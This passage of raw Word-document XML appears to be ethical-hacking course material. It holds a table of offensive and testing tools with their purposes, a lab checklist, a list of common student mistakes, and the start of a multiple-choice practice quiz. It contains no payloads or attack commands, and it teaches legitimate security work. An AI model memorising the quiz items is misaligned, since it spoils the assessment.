            <w:tcW w:type="dxa" w:w="1949"/>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Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5458"/>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Primary Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="233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theHarvester, Maltego, Shodan, Recon-ng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="194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Passive recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5458"/>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Collect public information with no contact to the target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2339"/>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Nmap, Netcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Active recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5458"/>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Discover live hosts, open ports, service versions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="233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enum4linux, SNMP walk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="194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Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5458"/>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Extract detailed service information (users, shares, config)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2339"/>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Nessus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Vulnerability scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5458"/>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Automated, broad weakness identification with CVSS scoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="233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Metasploit / Meterpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="194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Exploitation &amp; post-exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5458"/>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Exploit vulnerabilities and operate on a compromised host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2339"/>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John the Ripper, Hashcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Offline password cracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5458"/>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Recover plaintext from stolen password hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="233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Hydra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="194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Online brute force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5458"/>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Attack live login services directly over the network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2339"/>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Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Web application testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5458"/>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Intercept, modify, repeat and automate HTTP requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="233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DVWA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Practice target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5458"/>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Intentionally vulnerable web app for safe, legal SQLi/XSS/upload/CSRF practice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Checklist for Practical Examinations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab network confirmed Host-Only/Internal — no bridged adapter, no route to the real internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Snapshot taken before starting, so the environment can be reset.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Written authorisation / instructor sign-off confirmed for anything beyond the standard lab VMs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Both attacker and target IPs documented at the start of every practical.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every screenshot labelled with practical number and step.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Commands and their output recorded together, not just the final result.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Observation questions answered in your own words, referencing your own captured evidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Any created backdoor/persistence/test account removed at the end of the exercise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS scores shown with their full vector string, not just a bare number.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Report/finding sheet proofread for consistent severity ratings and terminology.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Common Mistakes Students Should Avoid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Treating a tool as inherently “legal” or “illegal” rather than understanding that authorisation is what matters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Running reconnaissance tools against real, unauthorised domains “just to practise”.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Quoting a CVSS score without stating the metric choices or vector string behind it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Assuming a high CVSS score is automatically the top remediation priority without checking exploitability and exposure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Confusing Grey Hat with White Hat — remembering that authorisation, not intention, is the deciding factor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Leaving a lab network in Bridged mode, risking exposure of intentionally vulnerable machines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Forgetting to verify scanner findings before including them in a report, risking false positives.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Using weak, pattern-based XSS filter bypasses as if they were a complete defence discussion, instead of explaining why output encoding/CSP are the real fix.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Leaving uploaded web shells or created backdoor accounts in the lab environment after an exercise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Writing a report's Executive Summary in technical jargon aimed at engineers instead of plain language for management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Final Practice Question Set (All Units)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple-Choice Questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Which single factor legally separates ethical hacking from a criminal offence under the IT Act, 2000?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The tester's skill level</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Written authorisation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The brand of tool used</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The time of day testing occurs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Which phase of the 5 Phases of Ethical Hacking corresponds most closely to the Cyber Kill Chain's Command &amp; Control stage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scanning &amp; Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Maintaining Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gaining Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> A CVSS vector of AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H corresponds to which severity band?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
